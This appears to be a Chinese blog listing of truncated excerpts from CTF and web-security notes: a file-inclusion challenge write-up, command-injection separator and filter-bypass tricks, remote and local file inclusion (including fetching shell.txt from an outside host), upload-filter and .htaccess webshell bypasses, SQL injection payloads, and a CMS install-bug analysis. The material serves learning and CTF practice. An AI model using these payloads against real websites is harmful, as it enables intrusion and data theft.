拿到题是一个上传文件查看文件的界面f12发现页面给了hint:flag in f1ag.php在查看文件这里有一个传参file=，疑似文件包含，用它来尝试读取源码通过读取源码重点在class.php和function.php里class.php<?phpclass C1e4r{ public $test; public $str; public function __co

命令注入可以通过分隔符;(前一条无论如何后一条都执行)||(前一条执行失败后一条执行) &&(前一条执行成功后一条执行)|(前一条命令的结果作为后一个命令的参数)换行符%0a,%0d``在命令里时可以内联执行过滤空格绕过:$IFS,${IFS},$IFS$9,,{cat,flag.php},$20,$09过滤关键字绕过 cat可用rev,fmt,more,base64,ta

文件包含远程文件包含远程代码执行：?file=[http|https|ftp]://example.com/shell.txt(需要allow_url_fopen=on&&allow_url_include=on)利用php流input：?file=php://input，此时文件会获取post提交的数据(需要allow_url_include=on)本地文件包含包含同目录

1.前端验证绕过:burp抓包改名字2.type类型验证绕过:把content/type改成image/jpeg3.黑名单绕过:改名php3,php4,php5,phtml……4.大小写混合绕过5.文件内容绕过:6.上传.htaccess绕过将目录及子目录下所有文件按php解析php_value auto_append_file /tmp/webshell.txt文件包含php_valu

一些绕过过滤in/or时，无法查询information_schemamysql5.7增加了sys系统数据库，payload如图过滤information_schema和sys时，可以用mysql库select table_name from mysql.innodb_table_stats where database_name=database()select table_name from

报错注入" class="reference-link">报错注入updatexml(1,concat(0x7e,(select语句)，0x7e)，1)extractvalue(1,concat(0x7e,(select语句)，0x7e))rand()+group()+count()/floor()一些几何函数(略)可以利用不存在函数爆数据库名8.0.x版本 uuid_to_bin((查询

布尔盲注" class="reference-link">布尔盲注 布尔状态如：回显不同响应状态码不同HTTP响应头变化基于错误的布尔注入基础语句：id=1'and ascii(substr((查询语句),1,1)>100)%23其中%23为#的url编码，在url中不能直接写#(浏览器会认为是片段而不是注释)ascci()的同名函数是ord()字符串的截取su

首先下载源码在本地搭建环境访问/install目录安装时出现了问题在index.php/?act=step5的时候页面直接空白了找找代码里面问题出在哪里了![]最后有$install_smarty->display(‘step5.htm’);如果代码执行到这里页面不会是空白的，继续往上找158行判断data目录是否可写，可写入就生成一个install.lock然后发现data目录里面也没有锁